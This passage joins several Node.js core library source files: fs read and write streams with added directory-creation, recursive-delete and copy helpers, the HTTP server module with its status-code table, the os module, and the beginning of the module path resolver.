  }

  
  
  
  var thisPool = pool;
  var toRead = Math.min(pool.length - pool.used, n);
  var start = pool.used;

  if (!util.isUndefined(this.pos))
    toRead = Math.min(this.end - this.pos + 1, toRead);

  
  
  if (toRead <= 0)
    return this.push(null);

  
  var self = this;
  fs.read(this.fd, pool, pool.used, toRead, this.pos, onread);

  
  if (!util.isUndefined(this.pos))
    this.pos += toRead;
  pool.used += toRead;

  function onread(er, bytesRead) {
    if (er) {
      if (self.autoClose) {
        self.destroy();
      }
      self.emit('error', er);
    } else {
      var b = null;
      if (bytesRead > 0)
        b = thisPool.slice(start, start + bytesRead);

      self.push(b);
    }
  }
};


ReadStream.prototype.destroy = function() {
  if (this.destroyed)
    return;
  this.destroyed = true;

  if (util.isNumber(this.fd))
    this.close();
};


ReadStream.prototype.close = function(cb) {
  var self = this;
  if (cb)
    this.once('close', cb);
  if (this.closed || !util.isNumber(this.fd)) {
    if (!util.isNumber(this.fd)) {
      this.once('open', close);
      return;
    }
    return process.nextTick(this.emit.bind(this, 'close'));
  }
  this.closed = true;
  close();

  function close(fd) {
    fs.close(fd || self.fd, function(er) {
      if (er)
        self.emit('error', er);
      else
        self.emit('close');
    });
    self.fd = null;
  }
};




fs.createWriteStream = function(path, options) {
  return new WriteStream(path, options);
};

util.inherits(WriteStream, Writable);
fs.WriteStream = WriteStream;
function WriteStream(path, options) {
  if (!(this instanceof WriteStream))
    return new WriteStream(path, options);

  options = options || {};

  Writable.call(this, options);

  this.path = path;
  this.fd = null;

  this.fd = options.hasOwnProperty('fd') ? options.fd : null;
  this.flags = options.hasOwnProperty('flags') ? options.flags : 'w';
  this.mode = options.hasOwnProperty('mode') ? options.mode : 438; 

  this.start = options.hasOwnProperty('start') ? options.start : undefined;
  this.pos = undefined;
  this.bytesWritten = 0;

  if (!util.isUndefined(this.start)) {
    if (!util.isNumber(this.start)) {
      throw TypeError('start must be a Number');
    }
    if (this.start < 0) {
      throw new Error('start must be >= zero');
    }

    this.pos = this.start;
  }

  if (!util.isNumber(this.fd))
    this.open();

  
  this.once('finish', this.close);
}

fs.FileWriteStream = fs.WriteStream; 


WriteStream.prototype.open = function() {
  fs.open(this.path, this.flags, this.mode, function(er, fd) {
    if (er) {
      this.destroy();
      this.emit('error', er);
      return;
    }

    this.fd = fd;
    this.emit('open', fd);
  }.bind(this));
};


WriteStream.prototype._write = function(data, encoding, cb) {
  if (!util.isBuffer(data))
    return this.emit('error', new Error('Invalid data'));

  if (!util.isNumber(this.fd))
    return this.once('open', function() {
      this._write(data, encoding, cb);
    });

  var self = this;
  fs.write(this.fd, data, 0, data.length, this.pos, function(er, bytes) {
    if (er) {
      self.destroy();
      return cb(er);
    }
    self.bytesWritten += bytes;
    cb();
  });

  if (!util.isUndefined(this.pos))
    this.pos += data.length;
};


WriteStream.prototype.destroy = ReadStream.prototype.destroy;
WriteStream.prototype.close = ReadStream.prototype.close;


WriteStream.prototype.destroySoon = WriteStream.prototype.end;




function SyncWriteStream(fd, options) {
  Stream.call(this);

  options = options || {};

  this.fd = fd;
  this.writable = true;
  this.readable = false;
  this.autoClose = options.hasOwnProperty('autoClose') ?
      options.autoClose : true;
}

util.inherits(SyncWriteStream, Stream);



fs.SyncWriteStream = SyncWriteStream;


SyncWriteStream.prototype.write = function(data, arg1, arg2) {
  var encoding, cb;

  
  if (arg1) {
    if (util.isString(arg1)) {
      encoding = arg1;
      cb = arg2;
    } else if (util.isFunction(arg1)) {
      cb = arg1;
    } else {
      throw new Error('bad arg');
    }
  }
  assertEncoding(encoding);

  
  if (util.isString(data)) {
    data = new Buffer(data, encoding);
  }

  fs.writeSync(this.fd, data, 0, data.length);

  if (cb) {
    process.nextTick(cb);
  }

  return true;
};


SyncWriteStream.prototype.end = function(data, arg1, arg2) {
  if (data) {
    this.write(data, arg1, arg2);
  }
  this.destroy();
};


SyncWriteStream.prototype.destroy = function() {
  if (this.autoClose)
    fs.closeSync(this.fd);
  this.fd = null;
  this.emit('close');
  return true;
};

SyncWriteStream.prototype.destroySoon = SyncWriteStream.prototype.destroy;

fs.mkdirP = function(p, opts, f, made) {
    if (typeof opts === 'function') {
        f = opts;
        opts = {};
    }
    else if (!opts || typeof opts !== 'object') {
        opts = { mode: opts };
    }

    var mode = opts.mode;
    var xfs = opts.fs || fs;

    if (mode === undefined) {
        mode = parseInt('0777', 8) & (~process.umask());
    }
    if (!made) made = null;

    var cb = f || function () { };
    p = pathModule.resolve(p);

    xfs.mkdir(p, mode, function (er) {
        if (!er) {
            made = made || p;
            return cb(null, made);
        }
        switch (er.code) {
            case 'ENOENT':
                fs.mkdirP(pathModule.dirname(p), opts, function (er, made) {
                    if (er) cb(er, made);
                    else fs.mkdirP(p, opts, cb, made);
                });
                break;

                
                
                
            default:
                xfs.stat(p, function (er2, stat) {
                    
                    
                    if (er2 || !stat.isDirectory()) cb(er, made)
                    else cb(null, made);
                });
                break;
        }
    });
}

fs.removeRecursive = function(path,cb){
  var self = this;

  fs.stat(path, function(err, stats) {
    if(err){
      cb(err,stats);
      return;
    }
    if(stats.isFile()){
      fs.unlink(path, function(err) {
        if(err) {
          cb(err,null);
        }else{
          cb(null,true);
        }
        return;
      });
    }else if(stats.isDirectory()){
      
      
      
      
      fs.readdir(path, function(err, files) {
        if(err){
          cb(err,null);
          return;
        }
        var f_length = files.length;
        var f_delete_index = 0;

        
        

        var checkStatus = function(){
          
          
          if(f_length===f_delete_index){
            fs.rmdir(path, function(err) {
              if(err){
                cb(err,null);
              }else{ 
                cb(null,true);
              }
            });
            return true;
          }
          return false;
        };
        if(!checkStatus()){
          for(var i=0;i<f_length;i++){
            
            
            
            (function(){
              var filePath = path + '/' + files[i];
              
              
              fs.removeRecursive(filePath,function removeRecursiveCB(err,status){
                if(!err){
                  f_delete_index ++;
                  checkStatus();
                }else{
                  cb(err,null);
                  return;
                }
              });
  
            })()
          }
        }
      });
    }
  });
};
var origCwd = process.cwd
var cwd = null
process.cwd = function() {
  if (!cwd)
    cwd = origCwd.call(process)
  return cwd
}
var chdir = process.chdir
process.chdir = function(d) {
  cwd = null
  chdir.call(process, d)
}





if (constants.hasOwnProperty('O_SYMLINK') &&
    process.version.match(/^v0\.6\.[0-2]|^v0\.5\./)) {
  fs.lchmod = function (path, mode, callback) {
    callback = callback || noop
    fs.open( path
           , constants.O_WRONLY | constants.O_SYMLINK
           , mode
           , function (err, fd) {
      if (err) {
        callback(err)
        return
      }
      
      
      fs.fchmod(fd, mode, function (err) {
        fs.close(fd, function(err2) {
          callback(err || err2)
        })
      })
    })
  }

  fs.lchmodSync = function (path, mode) {
    var fd = fs.openSync(path, constants.O_WRONLY | constants.O_SYMLINK, mode)

    
    
    var err, err2
    try {
      var ret = fs.fchmodSync(fd, mode)
    } catch (er) {
      err = er
    }
    try {
      fs.closeSync(fd)
    } catch (er) {
      err2 = er
    }
    if (err || err2) throw (err || err2)
    return ret
  }
}



if (!fs.lutimes) {
  if (constants.hasOwnProperty("O_SYMLINK")) {
    fs.lutimes = function (path, at, mt, cb) {
      fs.open(path, constants.O_SYMLINK, function (er, fd) {
        cb = cb || noop
        if (er) return cb(er)
        fs.futimes(fd, at, mt, function (er) {
          fs.close(fd, function (er2) {
            return cb(er || er2)
          })
        })
      })
    }

    fs.lutimesSync = function (path, at, mt) {
      var fd = fs.openSync(path, constants.O_SYMLINK)
        , err
        , err2
        , ret

      try {
        var ret = fs.futimesSync(fd, at, mt)
      } catch (er) {
        err = er
      }
      try {
        fs.closeSync(fd)
      } catch (er) {
        err2 = er
      }
      if (err || err2) throw (err || err2)
      return ret
    }

  } else if (fs.utimensat && constants.hasOwnProperty("AT_SYMLINK_NOFOLLOW")) {
    
    fs.lutimes = function (path, at, mt, cb) {
      fs.utimensat(path, at, mt, constants.AT_SYMLINK_NOFOLLOW, cb)
    }

    fs.lutimesSync = function (path, at, mt) {
      return fs.utimensatSync(path, at, mt, constants.AT_SYMLINK_NOFOLLOW)
    }

  } else {
    fs.lutimes = function (_a, _b, _c, cb) { process.nextTick(cb) }
    fs.lutimesSync = function () {}
  }
}







fs.chown = chownFix(fs.chown)
fs.fchown = chownFix(fs.fchown)
fs.lchown = chownFix(fs.lchown)

fs.chmod = chownFix(fs.chmod)
fs.fchmod = chownFix(fs.fchmod)
fs.lchmod = chownFix(fs.lchmod)

fs.chownSync = chownFixSync(fs.chownSync)
fs.fchownSync = chownFixSync(fs.fchownSync)
fs.lchownSync = chownFixSync(fs.lchownSync)

fs.chmodSync = chownFix(fs.chmodSync)
fs.fchmodSync = chownFix(fs.fchmodSync)
fs.lchmodSync = chownFix(fs.lchmodSync)

function chownFix (orig) {
  if (!orig) return orig
  return function (target, uid, gid, cb) {
    return orig.call(fs, target, uid, gid, function (er, res) {
      if (chownErOk(er)) er = null
      cb(er, res)
    })
  }
}

function chownFixSync (orig) {
  if (!orig) return orig
  return function (target, uid, gid) {
    try {
      return orig.call(fs, target, uid, gid)
    } catch (er) {
      if (!chownErOk(er)) throw er
    }
  }
}














function chownErOk (er) {
  if (!er)
    return true

  if (er.code === "ENOSYS")
    return true

  var nonroot = !process.getuid || process.getuid() !== 0
  if (nonroot) {
    if (er.code === "EINVAL" || er.code === "EPERM")
      return true
  }

  return false
}



if (!fs.lchmod) {
  fs.lchmod = function (path, mode, cb) {
    process.nextTick(cb)
  }
  fs.lchmodSync = function () {}
}
if (!fs.lchown) {
  fs.lchown = function (path, uid, gid, cb) {
    process.nextTick(cb)
  }
  fs.lchownSync = function () {}
}

if (process.platform === "win32") {
  var rename_ = fs.rename
  fs.rename = function rename (from, to, cb) {
    var start = Date.now()
    rename_(from, to, function CB (er) {
      if (er
          && (er.code === "EACCES" || er.code === "EPERM")
          && Date.now() - start < 1000) {
        return rename_(from, to, CB)
      }
      if(cb) cb(er)
    })
  }
}

var read = fs.read
fs.read = function (fd, buffer, offset, length, position, callback_) {
  var callback
  if (callback_ && typeof callback_ === 'function') {
    var eagCounter = 0
    callback = function (er, _, __) {
      if (er && er.code === 'EAGAIN' && eagCounter < 10) {
        eagCounter ++
        return read.call(fs, fd, buffer, offset, length, position, callback)
      }
      callback_.apply(this, arguments)
    }
  }
  return read.call(fs, fd, buffer, offset, length, position, callback)
}

var readSync = fs.readSync
fs.readSync = function (fd, buffer, offset, length, position) {
  var eagCounter = 0
  while (true) {
    try {
      return readSync.call(fs, fd, buffer, offset, length, position)
    } catch (er) {
      if (er.code === 'EAGAIN' && eagCounter < 10) {
        eagCounter ++
        continue
      }
      throw er
    }
  }
}


fs.ncp = function(source, dest, options, callback) {
  var cback = callback;

  if (!callback) {
    cback = options;
    options = {};
  }

  var basePath = process.cwd(),
      currentPath = path.resolve(basePath, source),
      targetPath = path.resolve(basePath, dest),
      filter = options.filter,
      rename = options.rename,
      transform = options.transform,
      clobber = options.clobber !== false,
      modified = options.modified,
      dereference = options.dereference,
      errs = null,
      started = 0,
      finished = 0,
      running = 0,
      limit = options.limit || fs.ncp.limit || 16;

  limit = (limit < 1) ? 1 : (limit > 512) ? 512 : limit;

  startCopy(currentPath);
  
  function startCopy(source) {
    started++;
    if (filter) {
      if (filter instanceof RegExp) {
        if (!filter.test(source)) {
          return cb(true);
        }
      }
      else if (typeof filter === 'function') {
        if (!filter(source)) {
          return cb(true);
        }
      }
    }
    return getStats(source);
  }

  function getStats(source) {
    var stat = dereference ? fs.stat : fs.lstat;
    if (running >= limit) {
      return setImmediate(function () {
        getStats(source);
      });
    }
    running++;
    stat(source, function (err, stats) {
      var item = {};
      if (err) {
        return onError(err);
      }

      
      item.name = source;
      item.mode = stats.mode;
      item.mtime = stats.mtime; 
      item.atime = stats.atime; 

      if (stats.isDirectory()) {
        return onDir(item);
      }
      else if (stats.isFile()) {
        return onFile(item);
      }
      else if (stats.isSymbolicLink()) {
        
        return onLink(source);
      }
    });
  }

  function onFile(file) {
    var target = file.name.replace(currentPath, targetPath);
    if(rename) {
      target =  rename(target);
    }
    isWritable(target, function (writable) {
      if (writable) {
        return copyFile(file, target);
      }
      if(clobber) {
        rmFile(target, function () {
          copyFile(file, target);
        });
      }
      if (modified) {
        var stat = dereference ? fs.stat : fs.lstat;
        stat(target, function(err, stats) {
            
            if (file.mtime.getTime()>stats.mtime.getTime())
                copyFile(file, target);
            else return cb();
        });
      }
      else {
        return cb();
      }
    });
  }

  function copyFile(file, target) {
    var readStream = fs.createReadStream(file.name),
        writeStream = fs.createWriteStream(target, { mode: file.mode });
    
    readStream.on('error', onError);
    writeStream.on('error', onError);
    
    if(transform) {
      transform(readStream, writeStream, file);
    } else {
      writeStream.on('open', function() {
        readStream.pipe(writeStream);
      });
    }
    writeStream.once('finish', function() {
        if (modified) {
            
            fs.utimesSync(target, file.atime, file.mtime);
            cb();
        }
        else cb();
    });
  }

  function rmFile(file, done) {
    fs.unlink(file, function (err) {
      if (err) {
        return onError(err);
      }
      return done();
    });
  }

  function onDir(dir) {
    var target = dir.name.replace(currentPath, targetPath);
    isWritable(target, function (writable) {
      if (writable) {
        return mkDir(dir, target);
      }
      copyDir(dir.name);
    });
  }

  function mkDir(dir, target) {
    fs.mkdir(target, dir.mode, function (err) {
      if (err) {
        return onError(err);
      }
      copyDir(dir.name);
    });
  }

  function copyDir(dir) {
    fs.readdir(dir, function (err, items) {
      if (err) {
        return onError(err);
      }
      items.forEach(function (item) {
        startCopy(path.join(dir, item));
      });
      return cb();
    });
  }

  function onLink(link) {
    var target = link.replace(currentPath, targetPath);
    fs.readlink(link, function (err, resolvedPath) {
      if (err) {
        return onError(err);
      }
      checkLink(resolvedPath, target);
    });
  }

  function checkLink(resolvedPath, target) {
    if (dereference) {
      resolvedPath = path.resolve(basePath, resolvedPath);
    }
    isWritable(target, function (writable) {
      if (writable) {
        return makeLink(resolvedPath, target);
      }
      fs.readlink(target, function (err, targetDest) {
        if (err) {
          return onError(err);
        }
        if (dereference) {
          targetDest = path.resolve(basePath, targetDest);
        }
        if (targetDest === resolvedPath) {
          return cb();
        }
        return rmFile(target, function () {
          makeLink(resolvedPath, target);
        });
      });
    });
  }

  function makeLink(linkPath, target) {
    fs.symlink(linkPath, target, function (err) {
      if (err) {
        return onError(err);
      }
      return cb();
    });
  }

  function isWritable(path, done) {
    fs.lstat(path, function (err) {
      if (err) {
        if (err.code === 'ENOENT') return done(true);
        return done(false);
      }
      return done(false);
    });
  }

  function onError(err) {
    if (options.stopOnError) {
      return cback(err);
    }
    else if (!errs && options.errs) {
      errs = fs.createWriteStream(options.errs);
    }
    else if (!errs) {
      errs = [];
    }
    if (typeof errs.write === 'undefined') {
      errs.push(err);
    }
    else { 
      errs.write(err.stack + '\n\n');
    }
    return cb();
  }

  function cb(skipped) {
    if (!skipped) running--;
    finished++;
    if ((started === finished) && (running === 0)) {
      if (cback !== undefined ) {
        return errs ? cback(errs) : cback(null);
      }
    }
  }
}

fs.copyFile = function(source, target, cb) {
  var cbCalled = false;

  var rd = fs.createReadStream(source);
  rd.on("error", function(err) {
    done(err);
  });
  var wr = fs.createWriteStream(target);
  wr.on("error", function(err) {
    done(err);
  });
  wr.on("close", function(ex) {
    done();
  });
  rd.pipe(wr);

  function done(err) {
    if (!cbCalled) {
      cb(err);
      cbCalled = true;
    }
  }
}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           

========






















var util = require('util');
var net = require('net');
var EventEmitter = require('events').EventEmitter;
var HTTPParser = process.binding('http_parser').HTTPParser;
var assert = require('assert').ok;

var common = require('_http_common');
var parsers = common.parsers;
var freeParser = common.freeParser;
var CRLF = common.CRLF;
var continueExpression = common.continueExpression;
var chunkExpression = common.chunkExpression;
var httpSocketSetup = common.httpSocketSetup;

var OutgoingMessage = require('_http_outgoing').OutgoingMessage;


var STATUS_CODES = exports.STATUS_CODES = {
  100 : 'Continue',
  101 : 'Switching Protocols',
  102 : 'Processing',                 
  200 : 'OK',
  201 : 'Created',
  202 : 'Accepted',
  203 : 'Non-Authoritative Information',
  204 : 'No Content',
  205 : 'Reset Content',
  206 : 'Partial Content',
  207 : 'Multi-Status',               
  300 : 'Multiple Choices',
  301 : 'Moved Permanently',
  302 : 'Moved Temporarily',
  303 : 'See Other',
  304 : 'Not Modified',
  305 : 'Use Proxy',
  307 : 'Temporary Redirect',
  308 : 'Permanent Redirect',         
  400 : 'Bad Request',
  401 : 'Unauthorized',
  402 : 'Payment Required',
  403 : 'Forbidden',
  404 : 'Not Found',
  405 : 'Method Not Allowed',
  406 : 'Not Acceptable',
  407 : 'Proxy Authentication Required',
  408 : 'Request Time-out',
  409 : 'Conflict',
  410 : 'Gone',
  411 : 'Length Required',
  412 : 'Precondition Failed',
  413 : 'Request Entity Too Large',
  414 : 'Request-URI Too Large',
  415 : 'Unsupported Media Type',
  416 : 'Requested Range Not Satisfiable',
  417 : 'Expectation Failed',
  418 : 'I\'m a teapot',              
  422 : 'Unprocessable Entity',       
  423 : 'Locked',                     
  424 : 'Failed Dependency',          
  425 : 'Unordered Collection',       
  426 : 'Upgrade Required',           
  428 : 'Precondition Required',      
  429 : 'Too Many Requests',          
  431 : 'Request Header Fields Too Large',
  500 : 'Internal Server Error',
  501 : 'Not Implemented',
  502 : 'Bad Gateway',
  503 : 'Service Unavailable',
  504 : 'Gateway Time-out',
  505 : 'HTTP Version Not Supported',
  506 : 'Variant Also Negotiates',    
  507 : 'Insufficient Storage',       
  509 : 'Bandwidth Limit Exceeded',
  510 : 'Not Extended',               
  511 : 'Network Authentication Required' 
};


function ServerResponse(req) {
  OutgoingMessage.call(this);

  if (req.method === 'HEAD') this._hasBody = false;

  this.sendDate = true;

  if (req.httpVersionMajor < 1 || req.httpVersionMinor < 1) {
    this.useChunkedEncodingByDefault = chunkExpression.test(req.headers.te);
    this.shouldKeepAlive = false;
  }
}
util.inherits(ServerResponse, OutgoingMessage);

ServerResponse.prototype._finish = function() {
  
  
  OutgoingMessage.prototype._finish.call(this);
};



exports.ServerResponse = ServerResponse;

ServerResponse.prototype.statusCode = 200;
ServerResponse.prototype.statusMessage = undefined;

function onServerResponseClose() {
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  if (this._httpMessage) this._httpMessage.emit('close');
}

ServerResponse.prototype.assignSocket = function(socket) {
  assert(!socket._httpMessage);
  socket._httpMessage = this;
  socket.on('close', onServerResponseClose);
  this.socket = socket;
  this.connection = socket;
  this.emit('socket', socket);
  this._flush();
};

ServerResponse.prototype.detachSocket = function(socket) {
  assert(socket._httpMessage === this);
  socket.removeListener('close', onServerResponseClose);
  socket._httpMessage = null;
  this.socket = this.connection = null;
};

ServerResponse.prototype.writeContinue = function(cb) {
  this._writeRaw('HTTP/1.1 100 Continue' + CRLF + CRLF, 'ascii', cb);
  this._sent100 = true;
};

ServerResponse.prototype._implicitHeader = function() {
  this.writeHead(this.statusCode);
};

ServerResponse.prototype.writeHead = function(statusCode, reason, obj) {
  var headers;

  if (util.isString(reason)) {
    
    this.statusMessage = reason;
  } else {
    
    this.statusMessage =
        this.statusMessage || STATUS_CODES[statusCode] || 'unknown';
    obj = reason;
  }
  this.statusCode = statusCode;

  if (this._headers) {
    
    if (obj) {
      var keys = Object.keys(obj);
      for (var i = 0; i < keys.length; i++) {
        var k = keys[i];
        if (k) this.setHeader(k, obj[k]);
      }
    }
    
    headers = this._renderHeaders();
  } else {
    
    headers = obj;
  }

  var statusLine = 'HTTP/1.1 ' + statusCode.toString() + ' ' +
                   this.statusMessage + CRLF;

  if (statusCode === 204 || statusCode === 304 ||
      (100 <= statusCode && statusCode <= 199)) {
    
    
    
    
    
    
    
    
    
    
    this._hasBody = false;
  }

  
  
  if (this._expect_continue && !this._sent100) {
    this.shouldKeepAlive = false;
  }

  this._storeHeader(statusLine, headers);
};

ServerResponse.prototype.writeHeader = function() {
  this.writeHead.apply(this, arguments);
};


function Server(requestListener) {
  if (!(this instanceof Server)) return new Server(requestListener);
  net.Server.call(this, { allowHalfOpen: true });

  if (requestListener) {
    this.addListener('request', requestListener);
  }

  
  
  
  this.httpAllowHalfOpen = false;

  this.addListener('connection', connectionListener);

  this.addListener('clientError', function(err, conn) {
    conn.destroy(err);
  });

  this.timeout = 2 * 60 * 1000;
}
util.inherits(Server, net.Server);


Server.prototype.setTimeout = function(msecs, callback) {
  this.timeout = msecs;
  if (callback)
    this.on('timeout', callback);
};


exports.Server = Server;


function connectionListener(socket) {
  var self = this;
  var outgoing = [];
  var incoming = [];

  function abortIncoming() {
    while (incoming.length) {
      var req = incoming.shift();
      req.emit('aborted');
      req.emit('close');
    }
    
  }

  function serverSocketCloseListener() {
    
    if (this.parser) {
      freeParser(this.parser, null, this);
    }

    abortIncoming();
  }

  httpSocketSetup(socket);

  
  
  
  if (self.timeout)
    socket.setTimeout(self.timeout);
  socket.on('timeout', function() {
    var req = socket.parser && socket.parser.incoming;
    var reqTimeout = req && !req.complete && req.emit('timeout', socket);
    var res = socket._httpMessage;
    var resTimeout = res && res.emit('timeout', socket);
    var serverTimeout = self.emit('timeout', socket);

    if (!reqTimeout && !resTimeout && !serverTimeout)
      socket.destroy();
  });

  var parser = parsers.alloc();
  parser.reinitialize(HTTPParser.REQUEST);
  parser.socket = socket;
  socket.parser = parser;
  parser.incoming = null;

  
  if (util.isNumber(this.maxHeadersCount)) {
    parser.maxHeaderPairs = this.maxHeadersCount << 1;
  } else {
    
    parser.maxHeaderPairs = 2000;
  }

  socket.addListener('error', socketOnError);
  socket.addListener('close', serverSocketCloseListener);
  parser.onIncoming = parserOnIncoming;
  socket.on('end', socketOnEnd);
  socket.on('data', socketOnData);

  
  function socketOnError(e) {
    self.emit('clientError', e, this);
  }

  function socketOnData(d) {
    assert(!socket._paused);
    var ret = parser.execute(d);
    if (ret instanceof Error) {
      socket.destroy(ret);
    } else if (parser.incoming && parser.incoming.upgrade) {
      
      var bytesParsed = ret;
      var req = parser.incoming;

      socket.removeListener('data', socketOnData);
      socket.removeListener('end', socketOnEnd);
      socket.removeListener('close', serverSocketCloseListener);
      parser.finish();
      freeParser(parser, req, null);
      parser = null;

      var eventName = req.method === 'CONNECT' ? 'connect' : 'upgrade';
      if (EventEmitter.listenerCount(self, eventName) > 0) {
        var bodyHead = d.slice(bytesParsed, d.length);

        
        
        socket._readableState.flowing = null;
        self.emit(eventName, req, socket, bodyHead);
      } else {
        
        socket.destroy();
      }
    }

    if (socket._paused) {
      
      socket.parser.pause();
    }
  }

  function socketOnEnd() {
    var socket = this;
    var ret = parser.finish();

    if (ret instanceof Error) {
      socket.destroy(ret);
      return;
    }

    if (!self.httpAllowHalfOpen) {
      abortIncoming();
      if (socket.writable) socket.end();
    } else if (outgoing.length) {
      outgoing[outgoing.length - 1]._last = true;
    } else if (socket._httpMessage) {
      socket._httpMessage._last = true;
    } else {
      if (socket.writable) socket.end();
    }
  }


  
  
  

  socket._paused = false;
  function socketOnDrain() {
    
    if (socket._paused) {
      socket._paused = false;
      socket.parser.resume();
      socket.resume();
    }
  }
  socket.on('drain', socketOnDrain);

  function parserOnIncoming(req, shouldKeepAlive) {
    incoming.push(req);

    
    
    
    if (!socket._paused) {
      var needPause = socket._writableState.needDrain;
      if (needPause) {
        socket._paused = true;
        
        
        
        socket.pause();
      }
    }

    var res = new ServerResponse(req);

    res.shouldKeepAlive = shouldKeepAlive;
    
    

    if (socket._httpMessage) {
      
      outgoing.push(res);
    } else {
      res.assignSocket(socket);
    }

    
    
    res.on('prefinish', resOnFinish);
    function resOnFinish() {
      
      
      
      assert(incoming.length === 0 || incoming[0] === req);

      incoming.shift();

      
      
      
      if (!req._consuming && !req._readableState.resumeScheduled)
        req._dump();

      res.detachSocket(socket);

      if (res._last) {
        socket.destroySoon();
      } else {
        
        var m = outgoing.shift();
        if (m) {
          m.assignSocket(socket);
        }
      }
    }

    if (!util.isUndefined(req.headers.expect) &&
        (req.httpVersionMajor == 1 && req.httpVersionMinor == 1) &&
        continueExpression.test(req.headers['expect'])) {
      res._expect_continue = true;
      if (EventEmitter.listenerCount(self, 'checkContinue') > 0) {
        self.emit('checkContinue', req, res);
      } else {
        res.writeContinue();
        self.emit('request', req, res);
      }
    } else {
      self.emit('request', req, res);
    }
    return false; 
  }
}
exports._connectionListener = connectionListener;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            

========






















var binding = process.binding('os');
var util = require('util');
var isWindows = process.platform === 'win32';

exports.endianness = binding.getEndianness;
exports.hostname = binding.getHostname;
exports.loadavg = binding.getLoadAvg;
exports.uptime = binding.getUptime;
exports.freemem = binding.getFreeMem;
exports.totalmem = binding.getTotalMem;
exports.cpus = binding.getCPUs;
exports.type = binding.getOSType;
exports.release = binding.getOSRelease;
exports.networkInterfaces = binding.getInterfaceAddresses;
exports.hardDriveId = binding.getHardDriveId;

exports.arch = function() {
    return binding.arch();
};

exports.platform = function() {
  return process.platform;
};

exports.tmpdir = function() {
  if (isWindows) {
    return process.env.TEMP ||
           process.env.TMP ||
           (process.env.SystemRoot || process.env.windir) + '\\temp';
  } else {
    return process.env.TMPDIR ||
           process.env.TMP ||
           process.env.TEMP ||
           '/tmp';
  }
};

exports.tmpDir = exports.tmpdir;

exports.getNetworkInterfaces = util.deprecate(function() {
  return exports.networkInterfaces();
}, 'getNetworkInterfaces is now called `os.networkInterfaces`.');

exports.EOL = isWindows ? '\r\n' : '\n';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         

========






















var NativeModule = require('native_module');
var util = NativeModule.require('util');
var runInThisContext = require('vm').runInThisContext;
var runInNewContext = require('vm').runInNewContext;
var assert = require('assert').ok;
var fs = NativeModule.require('fs');





function hasOwnProperty(obj, prop) {
  return Object.prototype.hasOwnProperty.call(obj, prop);
}


function Module(id, parent) {
  this.id = id;
  this.exports = {};
  this.parent = parent;
  if (parent && parent.children) {
    parent.children.push(this);
  }

  this.filename = null;
  this.loaded = false;
  this.children = [];
}
module.exports = Module;



Module._contextLoad = (+process.env['NODE_MODULE_CONTEXTS'] > 0);
Module._cache = {};
Module._pathCache = {};
Module._extensions = {};
var modulePaths = [];
Module.globalPaths = [];

Module.wrapper = NativeModule.wrapper;
Module.wrap = NativeModule.wrap;

var path = NativeModule.require('path');

Module._debug = util.debuglog('module');
















function statPath(path) {
  try {
    return fs.statSync(path);
  } catch (ex) {}
  return false;
}


var packageMainCache = {};

function readPackage(requestPath) {
  if (hasOwnProperty(packageMainCache, requestPath)) {
    return packageMainCache[requestPath];
  }

  try {
    var jsonPath = path.resolve(requestPath, 'package.json');
    var json = fs.readFileSync(jsonPath, 'utf8');
  } catch (e) {
    return false;
  }

  try {
    var pkg = packageMainCache[requestPath] = JSON.parse(json).main;
  } catch (e) {
    e.path = jsonPath;
    e.message = 'Error parsing ' + jsonPath + ': ' + e.message;
    throw e;
  }
  return pkg;
}

function tryPackage(requestPath, exts) {
  var pkg = readPackage(requestPath);

  if (!pkg) return false;

  var filename = path.resolve(requestPath, pkg);
  return tryFile(filename) || tryExtensions(filename, exts) ||
         tryExtensions(path.resolve(filename, 'index'), exts);
}




Module._realpathCache = {};


function tryFile(requestPath) {
  var stats = statPath(requestPath);
  if (stats && !stats.isDirectory()) {
    return fs.realpathSync(requestPath, Module._realpathCache);
  }
  return false;
}


function tryExtensions(p, exts) {
  for (var i = 0, EL = exts.length; i < EL; i++) {
    var filename = tryFile(p + exts[i]);

    if (filename) {
      return filename;
    }
  }
  return false;
}


Module._findPath = function(request, paths) {
  var exts = Object.keys(Module._extensions);

  if (request.charAt(0) === '/') {
    paths = [''];
  }

  var trailingSlash = (request.slice(-1) === '/');

  var cacheKey = JSON.stringify({request: request, paths: paths});
  if (Module._pathCache[cacheKey]) {
    return Module._pathCache[cacheKey];
  }

  
  for (var i = 0, PL = paths.length; i < PL; i++) {
    var basePath = path.resolve(paths[i], request);
    var filename;

    if (!trailingSlash) {
      
      filename = tryFile(basePath);

      if (!filename && !trailingSlash) {
        
        filename = tryExtensions(basePath, exts);
      }
    }

    if (!filename) {
      filename = tryPackage(basePath, exts);
    }

    if (!filename) {
      
      filename = tryExtensions(path.resolve(basePath, 'index'), exts);
    }

    if (filename) {
      Module._pathCache[cacheKey] = filename;
      return filename;
    }
  }
  return false;
};


Module._nodeModulePaths = function(from) {
  
  from = path.resolve(from);

  
  
  
